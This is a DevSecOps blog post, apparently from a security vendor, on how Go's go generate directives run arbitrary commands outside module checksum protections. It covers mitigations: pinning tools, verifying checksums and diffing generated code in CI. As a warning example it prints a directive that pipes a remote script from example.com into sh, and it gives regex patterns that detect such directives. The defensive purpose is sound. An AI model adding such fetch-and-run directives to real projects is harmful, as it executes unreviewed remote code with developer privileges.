DevSecOps

go generate Supply Chain Risks

go generate is a seam where arbitrary commands run with the full privileges of the developer, and it does not show up in any manifest of trusted dependencies.

Nayan Dey
Senior Security Engineer
7 min read

There is a seam in most Go projects that no dependency scanner watches, no checksum database verifies, and no go.mod declares. It is go generate. Anyone who has worked on a Go codebase of any size has run into //go:generate directives that invoke protoc, stringer, mockgen, sqlc, oapi-codegen, or some home-grown script. They work. They are convenient. They are also, from a supply chain perspective, a small blind spot that can grow into a big one.

I want to unpack what go generate actually does, where the trust boundaries are, and how teams can keep it from becoming an arbitrary code execution vector.

What does go generate do?

The command is simple. go generate ./... scans Go source files for comments of the form //go:generate <command> and executes each command in the directory of the file containing the directive. There is no sandbox. The command runs with the same privileges as the user running go generate. It can write files, network, spawn subprocesses, or do anything a shell command can do.

The directives look like this:

//go:generate stringer -type=State
//go:generate protoc --go_out=. types.proto
//go:generate sh -c "curl https://example.com/gen.sh | sh"

That third form is not hypothetical. I have seen it in real repositories. It executes a remote script every time go generate runs. The script's content is not pinned, not checksummed, and not reviewed.

Why is this a supply chain concern?

The Go module system gives you strong integrity guarantees for code that is imported and compiled. The checksum database, go.sum, the proxy verification, all of that covers import statements. None of it covers tools invoked by go generate. A //go:generate directive can reach out to any URL, invoke any binary on the developer's PATH, and write arbitrary files to the repository.

The typical flow is benign. A developer runs go generate locally before committing, and the generated files are reviewed as part of the PR. But the flow breaks down when go generate is run in CI, or when a developer trusts that the directive will do what the comment says without actually reading the command.

In March 2024, researchers documented a pattern where attackers targeted //go:generate directives that invoked tools downloaded via go install. If the tool's module was compromised, go generate would pull the latest version, which might contain malicious code, and run it with full privileges. There is no go.sum check for go install in this flow unless the tool is explicitly pinned.

Pinning generation tools

The first mitigation is to pin the tools that go generate invokes. There is a well-known pattern for this: a tools.go file with a build tag that imports the tools as dependencies, forcing them to appear in go.mod and go.sum.

//go:build tools

package tools

import (
    _ "golang.org/x/tools/cmd/stringer"
    _ "google.golang.org/protobuf/cmd/protoc-gen-go"
)

With this pattern, the tools are pinned to specific versions in go.mod, and go mod verify catches tampering. You then install them with go install golang.org/x/tools/cmd/stringer@v0.20.0 rather than go install golang.org/x/tools/cmd/stringer@latest.

Go 1.24, due February 2025, introduces the tool directive as a first-class way to declare tools in go.mod, which will replace the tools.go trick. Until then, tools.go is the accepted convention.

What about non-Go tools?

Protoc, grpc plugins, buf, sqlc in some configurations, and many others are not Go modules. They are binaries distributed as tarballs or through package managers. Pinning them is harder.

For protoc, I recommend using buf, which pulls pinned Docker images and tracks versions explicitly. For other binaries, pin by SHA256 checksum in the repository and validate on install. Tools like bingo and hermit can help manage binary dependencies with checksums.

A //go:generate directive that invokes protoc without a pinned version is a supply chain concern. The version on the developer's laptop might not match the version on the CI runner, and neither is verified.

Running go generate in CI

A common pattern is to run go generate ./... in CI and then check that the generated files match what was committed. The intent is to catch drift between committed generated code and what the generators would produce.

This is useful but has a catch. If the generators are not pinned, the CI run may produce different output than the developer ran locally, and the drift check fails not because the developer did anything wrong but because the CI's version of the generator differs. Worse, if the generator itself is compromised between the developer's run and the CI run, the CI will quietly accept the malicious output.

The mitigation is to run go generate only in a controlled environment where the tool versions are guaranteed, and treat the generated files as source of truth. The tools.go pattern plus go install with pinned versions makes this work.

Shell redirections and curl-piped installs

Any //go:generate that pipes curl into sh is a red flag. It executes remote content without verification. I maintain a simple regex check in pre-commit that flags such directives:

//go:generate.*curl.*\|.*sh
//go:generate.*wget.*\|.*bash

Teams push back because sometimes such directives are the most convenient way to install a one-off tool. My reply is that convenience is not a security principle. If a tool is worth depending on, it is worth pinning.

The generated code review problem

Generated code is often voluminous and visually noisy. Reviewers skip it. This is a well-known pattern across ecosystems. In Go, generated protobuf files for a medium-sized schema can run thousands of lines.

If an attacker can modify the generator or its inputs, they can inject code that is unlikely to be reviewed. The defense is to have two independent sources of truth: the committed generated code and the ability to regenerate it in CI and compare. If the regenerated output differs from the committed output, the build fails. This makes it impossible to smuggle hand-edited code into a generated file without detection.

Known incidents and patterns

In 2023, the ken-matsui/gh-s GitHub CLI extension ecosystem had a few reports of install-time code execution during go install. While not strictly a go generate case, it illustrated the same risk: tools installed with @latest can pull changing code.

CVE-2023-24531 affected go env handling of GOCACHE and GOTMPDIR, which indirectly affected go generate invocations that relied on those paths. Go 1.20.5 and 1.19.10 fixed it in June 2023.

What about code generation as a build step?

I prefer to commit generated files to the repository and treat go generate as a developer-invoked command, not a build step. The reviewed artifact is the code that will run in production. CI regenerates and diffs, rather than generating from scratch.

The alternative, regenerating during every build, requires full toolchain installation on every build runner, makes caching harder, and makes it harder to tell whether a change is from source or from a generator update. For some projects (protoc with very large schemas) the generated output is excluded from the repo and regenerated. That is fine as long as the tools are pinned and CI verification is strict.

How Safeguard Helps

Safeguard scans every repository for //go:generate directives and builds an inventory of the tools they invoke, their pinned versions, and whether they are declared in a tools.go file or the upcoming tool directive. When a directive references an unpinned binary, a remote script, or a tool with a known vulnerability, Safeguard raises a finding. Policy gates can block merges that introduce curl-piped-sh patterns or that downgrade a pinned tool version, and the generated-code drift check is surfaced alongside dependency findings in a unified view.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.